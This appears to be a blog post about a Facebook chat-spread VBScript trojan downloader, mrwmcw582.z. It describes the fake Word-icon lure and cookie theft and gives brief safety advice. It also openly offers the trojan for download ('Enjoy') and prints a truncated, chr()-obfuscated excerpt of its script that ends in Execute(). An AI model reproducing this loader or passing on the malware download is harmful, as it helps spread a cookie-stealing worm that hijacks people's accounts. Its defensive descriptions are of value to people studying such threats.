There are many facebook virus that are been developed and transmitted for advertising but the most irritating ones are those that are been created for self interests of developers for making fool of the People. This virus named mrwmcw582.z is a virus that opens up in the Chat Box obviously sent by some of your friend who has activated it in his System.
Also Read: How to get rid of facebook virus mrwmcw582.z
1. This is a mrwmcw582.z TrojanDownloader vbScript.
2. It comes along with a message and a smile as if its something funny and one would click it.
3. Moreover The icon displayed is a word file icon and no one would treat it as a virus.
4. However its a rar file with a extension .z and extracting it would give you a file named mrwmcw582.vbs
5. Triggering/Clicking this file would not display anything but it would run in the background and attack your cookies. It will replicate itself and would be sent to you friends as a message.
6. You can open the file .vbs in a notepad to view its code which cant be recognized as it has been written by converting it into ascii character code.
Security Measures for mrwmcw582.z trojan downloader:
Log Out of your Facebook account immediately so that it will not use your cookies and session attack can prevented. Cookie stealing was the most basic attack to get into someones account but it can be done only if the person itself sends the cookie details and this is what this trojan does. Dont Click it at all.
Beware: Your Antivirus will not detect it for the first time. The virus signature will be recognized once you trigger it. However until then the damage would be done. So don’t rely on your antivirus always.
Download this Facebook virus here: Download mrwmcw582.rar trojan
This is a .rar file so it wont auto generate until you extract and trigger it. Enjoy 🙂
CODE PREVIEW FOR THE VIRUS
Dim HHFJJTUU HHFJJTUU = chr( 2990-2911 ) &_ chr( 215930/1963 ) &_ chr( -175+207 ) &_ chr( -2892+2961 ) &_ chr( 2315-2201 ) &_ chr( 341772/2998 ) &_ chr( -1254+1365 ) &_ chr( 564186/4949 ) &_ chr( -4168+4200 ) &_ chr( -2862+2944 ) &_ chr( 3601-3500 ) &_ chr( 317170/2758 ) &_ chr( 218673/1869 ) &_ chr( -3344+3453 ) &_ chr( 1587-1486 ) &_ chr( 8544/267 ) &_ chr( 201-123 ) &_ chr( 379457/3757 ) &_ chr( 408480/3404 ) &_ chr( 21460/185 ) &_ chr( 43277/3329 ) &_ chr( 3174-3164 ) &_ chr( 248788/3034 ) &_ chr( 149962/1546 ) &_ chr( -2698+2808 ) &_ chr( 3662-3562 ) &_ chr( 2472-2361 ) &_ chr( -2105+2214 ) &_ chr( 455175/4335 ) &_ . . . . . . . . . .....//download the rar file for full code as the code contains hundreds of such line// . . . _ chr( -3422+3520 ) & vbcrlf Execute(HHFJJTUU) 'rwccrwwmcwchhwmhmrrhwchhwmhmrrrhwchhwmrwwwmchmmmcrwcccrhmcwcrmrhmcwcrwmhmchwchhhhhhhhwmrhmchwcrwcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
Incoming Terms: facebook spam mrwmcw582.z, facebook virus mrwmcw582.z, facebook trojan mrwmcw582.z